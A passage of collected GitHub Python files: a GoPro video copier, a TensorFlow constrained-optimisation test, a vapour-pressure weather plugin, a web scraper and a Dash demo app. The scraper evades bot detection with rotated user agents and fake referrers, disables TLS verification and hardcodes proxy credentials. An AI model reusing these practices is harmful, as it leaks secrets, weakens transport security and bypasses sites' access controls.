pathlib\nimport os\nimport re\nimport shutil\n\n# GPVideo should just hold the full path filenames. \n\nclass GPVideo:\n def __init__(self, videonumber, filenames=None):\n self.video_number = videonumber\n if not filenames:\n self.filenames = list()\n else:\n self.filenames = filenames\n def __lt__(self, num):\n return self.video_number < num\n def __str__(self):\n return \"%s: %s\" % (self.video_number, self.filenames)\n def add_video(self, filename):\n self.filenames.append(filename)\n\nclass GPVideoFolder:\n def __init__(self, folder, d=None):\n base_folder = pathlib.Path(folder)\n if not base_folder.is_dir():\n raise RuntimeError(\"base folder %s not found!\" % (folder))\n self.vdict = dict()\n if not d:\n # if no dict provided, then this should be a folder containing videos \n # as copied from the camera's SD card. \n \n # regex to see filename pattern that the GOPRO uses.\n # First capture group is the sequence number, second is the video id.\n video_name_pattern = re.compile('^GH([0-9]{2})([0-9]{4}).MP4$')\n \n # scan source folder. Create new GPVideo if needed. Add video \n # files as they come up.\n obj = os.scandir(folder)\n for entry in obj:\n if entry.is_file():\n m = video_name_pattern.match(entry.name)\n if m is not None:\n movie_id = m.groups()[1]\n movie_seq = m.groups()[0]\n if movie_id not in self.vdict:\n self.vdict[movie_id] = GPVideo(movie_id)\n self.vdict[movie_id].add_video(str(base_folder.joinpath(entry.name)))\n \n for v in self.vdict.values():\n v.filenames.sort()\n else:\n for k, v in d.items():\n self.vdict[k] = GPVideo(k, v) \n \n def all_filenames(self):\n '''\n Returns a list of all video filenames (no path, string) in this folder. \n '''\n l = list()\n for gpv in self.vdict.values():\n for f in gpv.filenames:\n l.append(f)\n return l\n def all_gpvideos(self):\n '''\n Returns list of GPVideo\n '''\n return self.vdict.values() \n def copy_and_delete(self, dest, doDelete=True):\n '''\n Copy all video files in this folder to the folder in dest, deleting each file from source folder after copy.\n :param dest: (string) destination folder for files.\n '''\n destination_folder = pathlib.Path(dest)\n if not destination_folder.is_dir():\n raise RuntimeError(\"destination video folder %s not found!\" % (dest))\n for filename in self.all_filenames():\n print(\"Copying %s to %s...\" % (filename, str(destination_folder)))\n shutil.copy(filename, destination_folder)\n \n # grok the destination filename\n pathFilename = pathlib.Path(filename)\n pathDestinationFile = destination_folder.joinpath(pathFilename.name)\n if pathFilename.stat().st_size == pathDestinationFile.stat().st_size :\n if doDelete:\n pathFilename.unlink()\n print(f\"Removed {str(filename)}\")\n else:\n print(f\"Source file {str(filename)} not deleted.\")\n else: \n raise RuntimeError(\"Incomplete file copy for %s, src/dest size %d/%d\" % (filename, pathFilename.stat().st_size, pathDestinationFile.stat().st_size))\n\nif __name__ == '__main__': \n parser = ArgumentParser()\n parser.add_argument(\"-s\", \"--source-folder\", required=True, help=\"folder containing (source) movie files\")\n parser.add_argument(\"-d\", \"--dest-folder\", required=True, help='destination folder for file operations (copy, compress)')\n parser.add_argument(\"-n\", \"--no-delete\", required=False, default=False, action='store_true', help=\"If set, do not delete files from source location after copy\")\n args = parser.parse_args()\n argsdict = vars(args)\n \n #vdict=GPVideoFolder('/Users/dan/workspace-python/gpcopy/testsrc')\n videos=GPVideoFolder(argsdict['source_folder'])\n videos.copy_and_delete(argsdict['dest_folder'], not argsdict['no_delete'])\n\n ","repo_name":"djsperka/box-upload-tool","sub_path":"test-flask/video_files.py","file_name":"video_files.py","file_ext":"py","file_size_in_byte":4546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"73499838189","text":"import sys\nimport tensorflow as tf\nimport numpy as np\nfrom grad_constr import lagrange_objective, lagrange_objective2, constrained_gradient_descent, newton_solver, flatify, total_loss\n\n# test\nmod = sys.argv[1]\n\n# algorithm params\nmaxiter = 20000\nstep = 0.2\nlrate = 0.1\ntol = 1.0e-7\nper = 100\n\n##\n## algebraic system\n##\n\nif mod == 'algebraic':\n # init\n x0 = 0.1\n y0 = -0.2\n z0 = 0.3\n\n # vars\n x = tf.Variable(3*[x0])\n y = tf.Variable(3*[y0])\n z = tf.Variable(3*[z0])\n\n # cons\n c1 = 1.0 - (x-0.5)**2 - (y+0.5)**2 - z**2\n c2 = 1.0 - (x+0.5)**2 - (y-0.5)**2 - z**2\n\n # output\n obj = -tf.reduce_mean(x+y+z)\n con = [c1, c2]\n var = [x, y, z]\n\n##\n## growth Model\n##\n\nif mod == 'growth':\n # params\n rho = tf.Variable(0.05)\n lam = tf.Variable(0.2)\n c = tf.Variable(1.5)\n\n # eq vars\n wt = tf.Variable(0.9)\n vt = tf.Variable(1.1)\n tau = tf.Variable(0.12)\n P = tf.Variable(0.8)\n R = tf.Variable(0.2)\n\n # inter\n pit = lam/(1.0+lam)\n\n # cons\n lmc = P + R - 1.0\n val = (rho+tau)*vt - pit\n ent = wt*c - vt\n lab = (1.0+lam)*wt*P - 1.0\n res = R - tau*c\n\n # moments\n rnd = c*tau\n grw = tf.log(1.0+lam)*tau\n prf = pit\n mmt_gen = [rnd, grw, prf]\n mmt_dat = [0.18, 0.022, 0.17]\n mmt = [g - d for g, d in zip(mmt_gen, mmt_dat)]\n\n # output\n obj = total_loss(mmt)\n con = [lmc, val, ent, lab, res]\n var = [rho, lam, c, wt, vt, tau, P, R]\n\n# update\n# newt = newton_solver(con, var)\n\nlobj, mult, lgrd_varz, lgrd_mult = lagrange_objective(obj, con, var)\ncgd = tf.train.GradientDescentOptimizer(learning_rate=lrate)\nmini = cgd.minimize(lobj, var_list=var+mult)\n\n# lobj = lagrange_objective2(obj, con, 5.0)\n# cgd = tf.train.GradientDescentOptimizer(learning_rate=lrate)\n# mini = cgd.minimize(lobj, var_list=var)\n\n# constraint error\ncvec = flatify(con)\ncerr = total_loss(con)\n\n# output\ndef status(i):\n print(f'{i:4d}: {obj.eval():10g} {cerr.eval():10g}')\n\nsess = tf.InteractiveSession()\n\nprint('initializing')\nsess.run(tf.global_variables_initializer())\nstatus(0)\n\n# print('solving')\n# for i in range(maxiter):\n# newt.run()\n# status(i)\n# if cerr.eval() < tol:\n# print('solved')\n# break\n\nprint('optimizing')\nlast_obj = np.inf\nfor i in range(maxiter):\n if i % per == 0:\n status(i)\n\n mini.run()\n\n next_obj = obj.eval()\n diff_obj = next_obj - last_obj\n last_obj = next_obj\n\n err = cerr.eval()\n\n if np.abs(next_obj) < tol and err < tol:\n print('optimized')\n status(i)\n break\n\n if np.isnan(next_obj) or np.isnan(err):\n print('failed')\n status(i)\n break\n","repo_name":"iamlemec/meteo","sub_path":"test_grad_constr.py","file_name":"test_grad_constr.py","file_ext":"py","file_size_in_byte":2650,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"6090696204","text":"# -*- coding: utf-8 -*-\nimport argparse\nimport logging\n\nimport fstpy\nimport numpy as np\nimport pandas as pd\n\nfrom ..humidityutils.humidityutils import (get_temp_phase_switch,\n validate_humidity_parameters, \n mandatory_ice_water_phase_when_using_temp_phase_switch)\nfrom ..plugin import Plugin, PluginParser\nfrom ..science import (TDPACK_OFFSET_FIX, rpn_vppr_from_hu, rpn_vppr_from_td,\n vppr_from_hr, vppr_from_hu, vppr_from_qv, vppr_from_td)\nfrom ..utils import (create_empty_result, existing_results, \n get_dependencies, get_existing_result, get_from_dataframe,\n initializer, explicit_params_checker, DependencyError)\nfrom ..configparsingutils import check_and_format_humidity_parsed_arguments\n\n\nclass VapourPressureError(Exception):\n pass\n\n\nclass VapourPressure(Plugin):\n \"\"\"Calculates the vapour pressure of water\n\n :param df: input DataFrame\n :type df: pd.DataFrame\n :param ice_water_phase: Switch to determine which phase to consider: ice and water ('both'), or, water only ('water'), defaults to 'both'\n :type ice_water_phase: str, optional\n :param temp_phase_switch: Temperature at which to change from the ice phase to the water phase, defaults to '-40'\n :type temp_phase_switch: float, optional\n :param temp_phase_switch_unit: Temperature phase switch unit, defaults to 'celsius'\n :type temp_phase_switch_unit: str, optional\n :param rpn: Use rpn library algorithm, defaults to False\n :type rpn: bool, optional\n :param dependency_check: Indicates the plugin is being called from another one who checks dependencies , defaults to False\n :type dependency_check: bool, optional \n :param copy_input: Indicates that the input fields will be returned with the plugin results , defaults to False\n :type copy_input: bool, optional \n \"\"\"\n computable_plugin = \"VPPR\"\n @explicit_params_checker\n @initializer\n def __init__(\n self,\n df: pd.DataFrame,\n ice_water_phase='both',\n temp_phase_switch=-40,\n temp_phase_switch_unit='celsius',\n rpn=False,\n dependency_check=False,\n copy_input=False):\n\n self.plugin_params = {\n 'ice_water_phase': self.ice_water_phase,\n 'temp_phase_switch': self.temp_phase_switch,\n 'temp_phase_switch_unit': self.temp_phase_switch_unit,\n 'rpn': self.rpn}\n\n self.plugin_mandatory_dependencies_rpn = [\n # HU + PXpa\n {\n 'HU': {'nomvar': 'HU', 'unit': 'kilogram_per_kilogram', 'select_only': True},\n 'PX': {'nomvar': 'PX', 'unit': 'pascal'}\n },\n # QVkg + PX\n {\n 'QV': {'nomvar': 'QV', 'unit': 'kilogram_per_kilogram', 'select_only': True},\n 'PX': {'nomvar': 'PX', 'unit': 'hectoPascal'}\n },\n #TT + HR + PX > HUrpn + PXpa\n {\n 'TT': {'nomvar': 'TT', 'unit': 'kelvin'},\n 'HR': {'nomvar': 'HR', 'unit': 'scalar', 'select_only': True},\n 'PX': {'nomvar': 'PX', 'unit': 'hectoPascal'}\n },\n # ES + TTk\n {\n 'TT': {'nomvar': 'TT', 'unit': 'kelvin'},\n 'ES': {'nomvar': 'ES', 'unit': 'kelvin', 'select_only': True},\n },\n # TDk + TTk\n {\n 'TT': {'nomvar': 'TT', 'unit': 'kelvin'},\n 'TD': {'nomvar': 'TD', 'unit': 'kelvin', 'select_only': True},\n }\n ]\n self.plugin_mandatory_dependencies = [\n # HU + PX\n {\n 'HU': {'nomvar': 'HU', 'unit': 'kilogram_per_kilogram', 'select_only': True},\n 'PX': {'nomvar': 'PX', 'unit': 'hectoPascal'}\n },\n # QVkg/kg + PX\n {\n 'QV': {'nomvar': 'QV', 'unit': 'kilogram_per_kilogram', 'select_only': True},\n 'PX': {'nomvar': 'PX', 'unit': 'hectoPascal'}\n },\n # HR + SVP\n {\n 'HR': {'nomvar': 'HR', 'unit': 'scalar', 'select_only': True},\n 'SVP': {'nomvar': 'SVP', 'unit': 'hectoPascal'},\n },\n # ES + TT\n {\n 'TT': {'nomvar': 'TT', 'unit': 'celsius'},\n 'ES': {'nomvar': 'ES', 'unit': 'celsius', 'select_only': True},\n },\n # TD + TT\n {\n 'TT': {'nomvar': 'TT', 'unit': 'celsius'},\n 'TD': {'nomvar': 'TD', 'unit': 'celsius', 'select_only': True},\n }\n ]\n\n self.plugin_result_specifications = {\n 'VPPR': {\n 'nomvar': 'VPPR',\n 'etiket': 'VAPRES',\n 'unit' : 'hectoPascal',\n 'nbits' : 16,\n 'datyp' : 1}}\n\n\n self.df = fstpy.metadata_cleanup(self.df)\n super().__init__(df)\n self.prepare_groups()\n\n def prepare_groups(self):\n self.no_meta_df = fstpy.add_columns(\n self.no_meta_df, columns=['unit', 'forecast_hour', 'ip_info'])\n\n mandatory_ice_water_phase_when_using_temp_phase_switch(\n VapourPressureError,\n self.explicit_params)\n\n validate_humidity_parameters(\n VapourPressureError,\n self.ice_water_phase,\n self.temp_phase_switch,\n self.temp_phase_switch_unit,\n explicit_temp_phase_switch = (\"temp_phase_switch\" in self.explicit_params),\n rpn=self.rpn)\n\n self.temp_phase_switch = get_temp_phase_switch(\n VapourPressureError,\n self.ice_water_phase == 'both',\n self.temp_phase_switch,\n self.temp_phase_switch_unit,\n self.rpn)\n\n # check if result already exists\n self.existing_result_df = get_existing_result(\n self.no_meta_df, self.plugin_result_specifications)\n self.groups = self.no_meta_df.groupby(\n ['grid', 'datev', 'ip1_kind'])\n\n\n def compute(self) -> pd.DataFrame:\n if not self.existing_result_df.empty:\n return existing_results(\n 'VapourPressure',\n self.existing_result_df,\n self.meta_df)\n\n logging.info('VapourPressure - compute')\n df_list = []\n try:\n if self.rpn:\n dependencies_list = get_dependencies(\n self.groups,\n self.meta_df,\n 'VapourPressure',\n self.plugin_mandatory_dependencies_rpn,\n self.plugin_params,\n intersect_levels=True,\n dependency_check = self.dependency_check)\n else:\n dependencies_list = get_dependencies(\n self.groups,\n self.meta_df,\n 'VapourPressure',\n self.plugin_mandatory_dependencies,\n self.plugin_params,\n intersect_levels=True,\n dependency_check = self.dependency_check)\n except DependencyError:\n if not self.dependency_check:\n raise DependencyError(f'{VapourPressure} - No matching dependencies found')\n else:\n for dependencies_df, option in dependencies_list:\n if self.rpn:\n if option == 0:\n # dependencies_df = get_intersecting_levels(dependencies_df,self.plugin_mandatory_dependencies_rpn[option])\n hu_df = get_from_dataframe(dependencies_df, 'HU')\n vppr_df = self.rpn_vapourpressure_from_hu_px(\n hu_df, dependencies_df, option)\n\n elif option == 1:\n vppr_df = self.vapourpressure_from_qv_px(\n dependencies_df, option, True)\n\n elif option == 2:\n # dependencies_df = get_intersecting_levels(dependencies_df,self.plugin_mandatory_dependencies_rpn[option])\n hu_df = self.compute_hu(dependencies_df)\n vppr_df = self.rpn_vapourpressure_from_hu_px(\n hu_df, dependencies_df, option)\n\n elif option == 3:\n # dependencies_df = get_intersecting_levels(dependencies_df,self.plugin_mandatory_dependencies_rpn[option])\n td_df = self.compute_td(dependencies_df)\n vppr_df = self.rpn_vapourpressure_from_tt_td(\n td_df, dependencies_df, option)\n\n else:\n # dependencies_df = get_intersecting_levels(dependencies_df,self.plugin_mandatory_dependencies_rpn[option])\n td_df = get_from_dataframe(dependencies_df, 'TD')\n vppr_df = self.rpn_vapourpressure_from_tt_td(\n td_df, dependencies_df, option)\n\n else:\n if option == 0:\n vppr_df = self.vapourpressure_from_hu_px(\n dependencies_df, option)\n\n elif option == 1:\n vppr_df = self.vapourpressure_from_qv_px(\n dependencies_df, option)\n\n elif option == 2:\n vppr_df = self.vapourpressure_from_hr_svp(\n dependencies_df, option)\n\n elif option == 3:\n # dependencies_df = get_intersecting_levels(dependencies_df,self.plugin_mandatory_dependencies[option])\n td_df = self.compute_td(dependencies_df)\n vppr_df = self.vapourpressure_from_tt_td(\n td_df, dependencies_df, option)\n\n else:\n # dependencies_df = get_intersecting_levels(dependencies_df,self.plugin_mandatory_dependencies[option])\n td_df = get_from_dataframe(dependencies_df, 'TD')\n vppr_df = self.vapourpressure_from_tt_td(\n td_df, dependencies_df, option)\n\n df_list.append(vppr_df)\n finally:\n return self.final_results(df_list, VapourPressureError, \n dependency_check = self.dependency_check, \n copy_input = self.copy_input)\n\n def vapourpressure_from_hu_px(self, dependencies_df, option):\n logging.info(f'VapourPressure - option {option+1}')\n # dependencies_df = get_intersecting_levels(dependencies_df,self.plugin_mandatory_dependencies[option])\n hu_df = get_from_dataframe(dependencies_df, 'HU')\n\n px_df = get_from_dataframe(dependencies_df, 'PX')\n vppr_df = create_empty_result(\n hu_df, self.plugin_result_specifications['VPPR'], all_rows=True)\n for i in vppr_df.index:\n hu = hu_df.at[i, 'd']\n px = px_df.at[i, 'd']\n vppr_df.at[i, 'd'] = vppr_from_hu(hu=hu, px=px).astype(np.float32)\n return vppr_df\n\n def vapourpressure_from_hr_svp(self, dependencies_df, option):\n logging.info(f'VapourPressure - option {option+1}')\n # dependencies_df = get_intersecting_levels(dependencies_df,self.plugin_mandatory_dependencies[option])\n\n svp_df = get_from_dataframe(dependencies_df, 'SVP')\n hr_df = get_from_dataframe(dependencies_df, 'HR')\n vppr_df = create_empty_result(\n svp_df,\n self.plugin_result_specifications['VPPR'],\n all_rows=True)\n for i in vppr_df.index:\n hr = hr_df.at[i, 'd']\n svp = svp_df.at[i, 'd']\n vppr_df.at[i, 'd'] = vppr_from_hr(\n hr=hr, svp=svp).astype(np.float32)\n return vppr_df\n\n def rpn_vapourpressure_from_tt_td(self, td_df, dependencies_df, option):\n logging.info(f'VapourPressure - rpn option {option+1}')\n\n ttk_df = get_from_dataframe(dependencies_df, 'TT')\n vppr_df = create_empty_result(\n ttk_df, self.plugin_result_specifications['VPPR'], all_rows=True)\n tdk_df = fstpy.unit_convert(td_df, 'kelvin')\n for i in vppr_df.index:\n ttk = ttk_df.at[i, 'd']\n tdk = tdk_df.at[i, 'd']\n vppr_df.at[i,\n 'd'] = rpn_vppr_from_td(td=tdk,\n tt=ttk,\n tpl=(self.temp_phase_switch if self.ice_water_phase != 'water' else -40),\n swph=self.ice_water_phase == 'both').astype(np.float32)\n return vppr_df\n\n def vapourpressure_from_qv_px(self, dependencies_df, option, rpn=False):\n if rpn:\n logging.info(f'VapourPressure - rpn option {option+1}')\n else:\n logging.info(f'VapourPressure - option {option+1}')\n # dependencies_df = get_intersecting_levels(dependencies_df,self.plugin_mandatory_dependencies[option])\n\n qvkgkg_df = get_from_dataframe(dependencies_df, 'QV')\n px_df = get_from_dataframe(dependencies_df, 'PX')\n vppr_df = create_empty_result(\n qvkgkg_df, self.plugin_result_specifications['VPPR'], all_rows=True)\n\n for i in vppr_df.index:\n qv = qvkgkg_df.at[i, 'd']\n px = px_df.at[i, 'd']\n vppr_df.at[i, 'd'] = vppr_from_qv(qv=qv, px=px).astype(np.float32)\n return vppr_df\n\n def vapourpressure_from_tt_td(self, td_df, dependencies_df, option):\n logging.info(f'VapourPressure - option {option+1}')\n\n tt_df = get_from_dataframe(dependencies_df, 'TT')\n vppr_df = create_empty_result(\n tt_df, self.plugin_result_specifications['VPPR'], all_rows=True)\n for i in vppr_df.index:\n tt = tt_df.at[i, 'd']\n td = td_df.at[i, 'd']\n vppr_df.at[i,\n 'd'] = vppr_from_td(td=td - TDPACK_OFFSET_FIX,\n tt=tt - TDPACK_OFFSET_FIX,\n tpl=(self.temp_phase_switch if self.ice_water_phase != 'water' else -40),\n swph=self.ice_water_phase == 'both').astype(np.float32)\n return vppr_df\n\n def rpn_vapourpressure_from_hu_px(self, hu_df, dependencies_df, option):\n logging.info(f'VapourPressure - rpn option {option+1}')\n\n pxpa_df = get_from_dataframe(dependencies_df, 'PX')\n vppr_df = create_empty_result(\n pxpa_df, self.plugin_result_specifications['VPPR'], all_rows=True)\n # pxpa_df = fstpy.unit_convert(px_df, 'pascal')\n for i in vppr_df.index:\n pxpa = pxpa_df.at[i, 'd']\n hu = hu_df.at[i, 'd']\n vppr_df.at[i, 'd'] = rpn_vppr_from_hu(\n hu=hu, px=pxpa).astype(np.float32)\n return vppr_df\n\n def compute_hu(self, dependencies_df):\n from ..humidityspecific import HumiditySpecific\n hu_df = HumiditySpecific(\n pd.concat(\n [\n dependencies_df,\n self.meta_df],\n ignore_index=True),\n ice_water_phase=self.ice_water_phase,\n temp_phase_switch=self.temp_phase_switch,\n temp_phase_switch_unit=self.temp_phase_switch_unit,\n rpn=True, \n dependency_check=self.dependency_check).compute()\n hu_df = get_from_dataframe(hu_df, 'HU')\n return hu_df\n\n def compute_td(self, dependencies_df):\n from ..temperaturedewpoint import TemperatureDewPoint\n td_df = TemperatureDewPoint(\n pd.concat(\n [\n dependencies_df,\n self.meta_df],\n ignore_index=True),\n ice_water_phase=self.ice_water_phase,\n temp_phase_switch=self.temp_phase_switch,\n temp_phase_switch_unit=self.temp_phase_switch_unit, \n dependency_check=self.dependency_check).compute()\n td_df = get_from_dataframe(td_df, 'TD')\n return td_df\n\n @staticmethod\n def parse_config(args: str) -> dict:\n \"\"\"method to translate spooki plugin parameters to python plugin parameters\n :param args: input unparsed arguments\n :type args: str\n :return: a dictionnary of converted parameters\n :rtype: dict\n \"\"\"\n parser = PluginParser(prog=VapourPressure.__name__, parents=[Plugin.base_parser],add_help=False)\n\n parser.add_argument('--iceWaterPhase',type=str,required=False,choices=[\"WATER\",\"BOTH\"],dest='ice_water_phase', help=\"Switch to determine which phase to consider: ice and water, or, water only.\\nMandatory when using --temperaturePhaseSwitch (Default: BOTH)\")\n parser.add_argument('--temperaturePhaseSwitch',type=str,help=\"Temperature at which to change from the ice phase to the water phase. (Default: -40C)\")\n parser.add_argument('--RPN',action='store_true',default=False,dest=\"rpn\", help=\"Use of the RPN TdPack functions\")\n\n parsed_arg = vars(parser.parse_args(args.split()))\n\n check_and_format_humidity_parsed_arguments(parsed_arg, error_class=VapourPressureError)\n\n return parsed_arg\n","repo_name":"sebastiendfortier/spookipy","sub_path":"spookipy/vapourpressure/vapourpressure.py","file_name":"vapourpressure.py","file_ext":"py","file_size_in_byte":17404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"44525174194","text":"import time\nimport random\nimport os\n\nfrom bs4 import BeautifulSoup\n\nfrom common import request_utils\nfrom common import common_utils\n\nimport urllib3\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n# Some basic anti bot settings to mask\nUSER_AGENT_FILE = os.path.join(os.path.dirname(__file__), 'user-agents.txt')\nREFERRER_LIST = [\"http:www.google.com\", \"http:www.bing.com\", \"http:www.swisscows.com\", \"http:www.duckduckgo.com\", \"http:www.startpage.com\"]\nBASE_HEADERS = {\"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\",\n \"Accept-Encoding\": \"gzip, deflate, br\",\n \"Accept-Language\": \"en-US,en;q=0.9\"}\n\n# Proxy details\nPROXY_USER = os.getenv(\"PROXY_USER\", \"sp70601931\")\nPROXY_PASS = os.getenv(\"PROXY_PASS\", \"Password123!\")\n# PROXY_USER = os.getenv(\"PROXY_USER\", \"\")\n# PROXY_PASS = os.getenv(\"PROXY_PASS\", \"\")\nif not PROXY_USER or not PROXY_PASS:\n print(\"Proxy credentials may be missing. Ensure the PROXY_USER and PROXY_PASS environment variables are present on the Lambda configuration page.\")\n\nPROXY_ENDPOINT = f\"http://user-{PROXY_USER}:{PROXY_PASS}@us.smartproxy.com:10000\"\nPROXIES = {\"http\": PROXY_ENDPOINT, \"https\": PROXY_ENDPOINT}\n\n\nclass DetectableScraper(object):\n def __init__(self):\n super(DetectableScraper, self).__init__()\n\n # Read the list of user agents from file\n try:\n with open(USER_AGENT_FILE, \"r\") as f:\n self.user_agent_pool = [line.strip() for line in f.readlines()]\n except Exception as e:\n print(f\"Failed to open the user agent file: {USER_AGENT_FILE} with the error: {e}\")\n\n def make_request(self, url):\n \"\"\"\n Creates a retry session and makes a request to the given url.\n\n If the initial request fails, an attempt is made to get the url\n through a proxy instead\n\n Args:\n url(str): The url to make a request to\n\n Returns:\n requests.Response or None: Returns a request object on a successful request else None\n \"\"\"\n retry_session = request_utils.requests_retry_session(retries=1)\n\n headers = {\"User-Agent\": random.choice(self.user_agent_pool),\n \"Referer\": random.choice(REFERRER_LIST)}\n headers.update(BASE_HEADERS)\n retry_session.headers.update(headers)\n\n try:\n print(f\"Getting {url}\")\n initial_get_start_time = time.time()\n r = retry_session.get(url, headers=headers, timeout=1, stream=True, verify=False)\n print(f\"Initial GET request took {time.time() - initial_get_start_time}s to complete.\")\n except Exception as e:\n print(f\"Initial GET request took {time.time() - initial_get_start_time}s to complete.\")\n print(f\"Timed out getting the page, next attempt is with a proxy\")\n try:\n proxy_get_start_time = time.time()\n r = retry_session.get(url, headers=headers, timeout=1, stream=True, verify=False, proxies=PROXIES)\n print(f\"Proxy GET request took {time.time() - proxy_get_start_time}s to complete.\")\n except Exception as e:\n print(f\"Proxy GET request took {time.time() - proxy_get_start_time}s to complete.\")\n print(f\"Timed out getting the page with proxy, returning\")\n return None\n\n return r\n\n def scrape_page(self, url):\n \"\"\"\n Requests the page at the given url and tries to find the relavent data\n if the request is successful.\n\n Detects a possible IP Ban as well as when an anti cloudflare solution will be needed\n\n Args:\n url(str): The url to make a request to\n\n Returns:\n dict: If data was able to be found, a dict of this data is returned. Else a dict\n containing an error message to indicate the anti cloudflare scrape is needed.\n \"\"\"\n response = self.make_request(url)\n\n # Couldn't make a response through a normal request?\n if not response:\n print(f\"Response from {url} failed\")\n print(f\"Possible Bot Detection\")\n return {\"Error\": \"Needs anti-cloudflare request.\"}\n\n soup_parse_time = time.time()\n soup = BeautifulSoup(response.content.decode(\"utf-8\"), \"html.parser\")\n print(f\"Parsing page took {time.time() - soup_parse_time}s to complete.\")\n\n # Connection was made, and data retrieved, but lets check if we have an anti-bot page\n if response.status_code != 200:\n # Check if we've been blocked\n if self.detect_block(soup):\n return {\"Error\": \"Needs anti-cloudflare request.\"}\n return \"\"\n\n data_collection_time = time.time()\n # Check if we can find the OG properties first\n product_name = self.get_meta_tag_info(soup, \"title\")\n product_image = self.clean_url_string(self.get_meta_tag_info(soup, \"image\"))\n product_desc = self.get_meta_tag_info(soup, \"description\")\n\n # If we didn't have a title meta tag, check the title tag instead\n if not product_name:\n title_ele = soup.select(\"title\")\n if title_ele:\n product_name = title_ele[0].contents[0]\n\n # Now look for all of the images likely to be the product\n image_set = self.get_all_images_filtered(soup)\n if product_image:\n image_set = [product_image] + image_set\n\n # Make sure all images are absolute\n final_image_set = set()\n for image_url in image_set:\n final_image_set.add(common_utils.relative_to_absolute_url(url, image_url))\n\n print(f\"Data collection took {time.time() - data_collection_time}s to complete.\")\n return {\"product_name\": product_name,\n \"product_image_urls\": list(final_image_set)[:20], # Take 20 images max\n \"product_description\": product_desc,\n \"status_code\": response.status_code}\n\n @staticmethod\n def contains_cloudflare_text(text):\n \"\"\"\n Checks if a string contains known bot detection alert text\n\n Args:\n text(str): The text to check\n\n Returns:\n bool: True if known text is found else False\n \"\"\"\n return any([x in text.lower() for x in [\"cloudflare\", \"captcha\"]])\n\n @staticmethod\n def detect_block(soup):\n \"\"\"\n Looks through various elements on the page to try and determine whether\n or not we have been blocked by anti-bot\n\n Args:\n soup(BeautifulSoup.Soup): The soup object containing the parsed html\n\n Returns:\n bool: True if it was determined we were detected else False\n \"\"\"\n # Check the title for cloudflare\n title_ele = soup.select(\"title\")\n if title_ele:\n if title_ele[0].contents:\n title_string = title_ele[0].contents[0] or \"\"\n if DetectableScraper.contains_cloudflare_text(title_string):\n return True\n\n body_ele = soup.select(\"body\")\n if body_ele:\n if not body_ele[0].text:\n return True\n for i in body_ele[0].contents:\n if i:\n if DetectableScraper.contains_cloudflare_text(i.text):\n return True\n return False\n\n @staticmethod\n def get_meta_tag_info(soup, name):\n \"\"\"\n Pulls the meta tag information from a parsed page\n\n Args:\n soup(BeautifulSoup.Soup): The soup object containing the parsed html\n name(str): The name of the element to search for\n\n Returns:\n str: The text from the tag if found\n \"\"\"\n meta_tag_ele = soup.find(\"meta\", property=f\"og:{name}\")\n if meta_tag_ele:\n return meta_tag_ele.get(\"content\", \"\")\n return \"\"\n\n @staticmethod\n def clean_url_string(url):\n \"\"\"\n Removes any newlines and spaces found at the start/end of a string\n\n Args:\n str(url): The url string to clean up\n\n Returns:\n str: The cleaned up text\n \"\"\"\n return url.replace(\"\\n\", \"\").strip()\n\n @staticmethod\n def get_all_images_filtered(soup):\n \"\"\"\n Searches a parsed html page for all img tags, pulls the src data, and then filters them down\n to the most likely images to be related to the product based.\n\n Args:\n soup(BeautifulSoup.Soup): The soup object containing the parsed html\n\n Returns:\n list(str): A list of found image urls.\n \"\"\"\n image_set = set()\n for img_tag in soup.select(\"img\"):\n img_url = \"\"\n\n # Check which attribute is being used to store the image data\n if img_tag.get(\"srcset\", \"\"):\n img_url = DetectableScraper.clean_url_string(img_tag.get(\"srcset\").split()[0])\n elif img_tag.get(\"src\", \"\"):\n img_url = DetectableScraper.clean_url_string(img_tag.get(\"src\"))\n\n # Only accept the image types likely to represent a product\n if any([x in img_url for x in [\"image\", \"jpg\", \"png\", \"jpeg\"]]):\n if \".svg\" in img_url:\n continue\n if img_url.startswith(\"data:\"):\n continue\n try:\n getHeight = 126\n for i in [\"sh=\", \"hei=\", \"height=\"]:\n tryingToFind = img_url.find(i)\n if tryingToFind != -1:\n s = img_url[tryingToFind+len(i):tryingToFind+(len(i)+4)]\n getHeight = int(s.split('&')[0])\n break\n if getHeight < 125:\n continue\n except:\n print(\"Error parsing height\")\n \n image_set.add(img_url)\n\n return list(image_set)\n","repo_name":"creditsoftware/scraping_websites","sub_path":"scrapers/detectable_scraper.py","file_name":"detectable_scraper.py","file_ext":"py","file_size_in_byte":10056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"29002464482","text":"import os\n\nfrom flask import Flask\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\n\n\nserver = Flask(__name__)\n\napp = dash.Dash(name='Bootstrap_docker_app',\n server=server)\n\ncolors = {\n 'background': '#AAA',\n 'text': '#7FDBFF'\n}\n\napp.layout = html.Div(style={'backgroundColor': colors['background']}, children=[\n html.H1(\n children='This is a H1 ',\n style={\n 'textAlign': 'center',\n 'color': colors['text']\n }\n ),\n\n html.Div(children='Dash: Sample Flask App', style={\n 'textAlign': 'center',\n 'color': colors['text']\n }),\n\n dcc.Graph(\n id='example-graph-2',\n figure={\n 'data': [\n {'x': [1, 2, 3], 'y': [4, 1, 2], 'type': 'line', 'name': 'Fridge'},\n {'x': [1, 2, 3], 'y': [2, 4, 5], 'type': 'line', 'name': u'Freezer'},\n ],\n 'layout': {\n 'images': [\n {\n 'xref':\"paper\",\n 'yref':\"paper\",\n 'x':1,\n 'y':1.05,\n 'sizex':0.2,\n 'sizey':0.2,\n 'xanchor':\"right\",\n 'yanchor':\"bottom\"\n }],\n 'plot_bgcolor': colors['background'],\n 'paper_bgcolor': colors['background'],\n 'font': {\n 'color': colors['text']\n }\n }\n }\n )\n])\n\nif __name__ == '__main__':\n debug = os.environ.get(\"DASH_DEBUG\", False)\n app.run_server(debug=debug)\n","repo_name":"bhoy-troy/Plotly-Flask","sub_path":"dash/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} 